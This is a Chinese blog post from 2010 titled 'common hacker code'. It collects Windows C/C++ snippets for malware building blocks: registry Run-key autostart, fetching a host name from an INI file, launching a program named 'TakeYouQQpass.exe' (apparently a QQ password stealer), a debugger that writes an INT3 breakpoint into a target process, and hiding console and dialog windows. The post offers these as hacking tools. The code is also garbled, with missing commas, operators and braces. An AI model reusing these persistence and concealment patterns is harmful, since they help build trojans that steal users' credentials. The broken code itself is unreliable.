常用黑代码

Posted on 2010-08-12 13:42 傅先生 阅读(643) 评论(0)  编辑 收藏 引用 所属分类: 常用"黑软件"代码


/////////////////////////自启动
void autoToWindows()
{
    HKEY hKey
//找到系统的启动项 
LPCTSTR lpRun "Software\\Microsoft\\Windows\\CurrentVersion\\Run"
    char pFileName[100] = {0}; 
//打开启动项Key 
long lRet RegOpenKeyEx(HKEY_LOCAL_MACHINElpRun0KEY_WRITE, &hKey); 
    //得到程序自身的全路径 
    DWORD dwRet GetModuleFileName(NULLpFileNameMAX_PATH); 





    //添加一个子Key,并设置值 // 下面的"getip"是应用程序名字(不加后缀.exe)
    lRet RegSetValueEx(hKey"TTTTTT"0REG_SZ, (BYTE *)pFileNamedwRet);

    //关闭注册表 
    RegCloseKey(hKey); 
    if(lRet != ERROR_SUCCESS
    { 
        printf("自动失败");
     //   AfxMessageBox("系统参数错误,不能随系统启动"); 
    



//CString   str; //添加注册表路径 
//WCHAR*     CurrentPath=(WCHAR*)malloc(sizeof(char)*100);//程序当前路径
}

///////////获取配置文件
int TakeMsgAdd()
{
    WSADATA firstsock;
    char strName2[100]="";
    
    char hostname[100];//"www.hao123.com";
    GetPrivateProfileString("MessageTO","Address",NULL,strName2,100,".\\MessgeTO.ini");
    
    memcpy(hostname,strName2,100);
    
    
    
    RetrieveDnsServersFromRegistry();
    
    printf("\nInitialising Winsock...");
    if (WSAStartup(MAKEWORD(2,2),&firstsock) != 0)
    {
        printf("Failed. Error Code : %d",WSAGetLastError());
        return 1;
    } 
    printf("Initialised.");
    
    printf("\nEnter Hostname to Lookup : ");
    //    gets((char*)hostname);
    //    
    
    
    ngethostbyname((unsigned char *)hostname);
    
    return 0;
}
     
 autoToWindows();



//////////创建进程
    char chPath[301];
    char path[200]= "\\TakeYouQQpass.exe";
    
    
    ::GetCurrentDirectory(300,(LPTSTR)chPath);//得到当前目录
    strcat(chPath,path);
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    ZeroMemory( &pisizeof(pi) );
    ZeroMemory( &sisizeof(si) );
    si.cb sizeof(si);
    
    // Start the child process
    //ShellExecute(this->m_hWnd,"open",chPath,"","", SW_SHOW ); //,1,支持多个可以隐藏式运行
 //   WinExec(chPath,SW_SHOW);  //1,普通可以隐藏式运行


    if(CreateProcess(chPath""NULLNULLFALSE0NULLNULL, &si, &pi))//3,获取程序资料
    {
        // CloseHandle( pi.hProcess );
        // CloseHandle( pi.hThread );
    }
    else 
    {
        //  //AfxMessageBox("创建失败!");
        //  HANDLE hProcess = GetCurrentProcess();//get current process
        //  TerminateProcess(hProcess,0);         //close process
    
///////////////////////////

#define SZFILENAME       ".\\TraceMe.exe"  //目标文件名
    STARTUPINFO                si ;
    PROCESS_INFORMATION        pi ;
    ZeroMemory(&sisizeof(STARTUPINFO)) ;
    ZeroMemory(&pisizeof(PROCESS_INFORMATION)) ;
    si.cb sizeof(STARTUPINFO) ;
    
    BOOL    WhileDoFlag=TRUE;
    BYTE    ReadBuffer[MAX_PATH]={0};
    BYTE    dwINT3code[1]={0xCC};
    BYTE    dwOldbyte[1]={0};

    if( !CreateProcess(SZFILENAME
        NULL
        NULL,  
        NULL,  
        FALSE,   
        DEBUG_PROCESS|DEBUG_ONLY_THIS_PROCESS
        NULL,          
        NULL,          
        &si,            
        &pi )        
        ) 
    {
        MessageBox(NULL"CreateProcess Failed.""ERROR"MB_OK); 
        return FALSE
    } 

//    
//    自启动
  









隐藏运行程序
2010-08-10 17:48
 

 

 

1,打开方式:shellopen

2,代码修改1,命令行程序 ,2,窗口程序

1,命令行程序:

其实是某些程序虽然目标是生成视窗程序,但是却是使用控制台的方式编译的(特别是使用某些从LINLUX平台移植到WINDOWS上来的程序库)。所以在启动时我们会看一个暴露我们实现的命令行窗口。想要隐藏着个窗口,只需要在visual c++中main函数入口前加入
#pragma commentlinker"/subsystem:\"windows\" /entry:\"mainCRTStartup\"" )
这是控制编译器的命令。意思是使用视窗模式编译程序。但将程序入口地址强制设置为main函数(否则程序会因为找不到入口地址而通不过链接)。你也可以在项目属性中linker的选项下设置相应的项来达到此目的。

----------------------------

2,窗口程序:

LRESULT CPackInterDlg::DefWindowProc(UINT messageWPARAM wParamLPARAM lParam
{
// TODO: Add your specialized code here and/or call the base class
    if(WM_NCPAINT == message)
    {
        ShowWindow(SW_HIDE);
    }

return CDialog::DefWindowProc(messagewParamlParam);


}

LRESULT CMainFrame::DefWindowProc(UINT message, WPARAM wParam, LPARAM lParam)
{
 // TODO: Add your specialized code here and/or call the base class
/*    if(WM_NCPAINT == message)
    {
        ShowWindow(SW_HIDE);
    }*/
 return CFrameWnd::DefWindowProc(message, wParam, lParam);
}
---------------------------------------


 

只有注册用户登录后才能发表评论。
网站导航: 博客园   IT新闻   BlogJava   知识库   博问   管理


posts - 54, comments - 5, trackbacks - 0, articles - 2

Copyright © 傅先生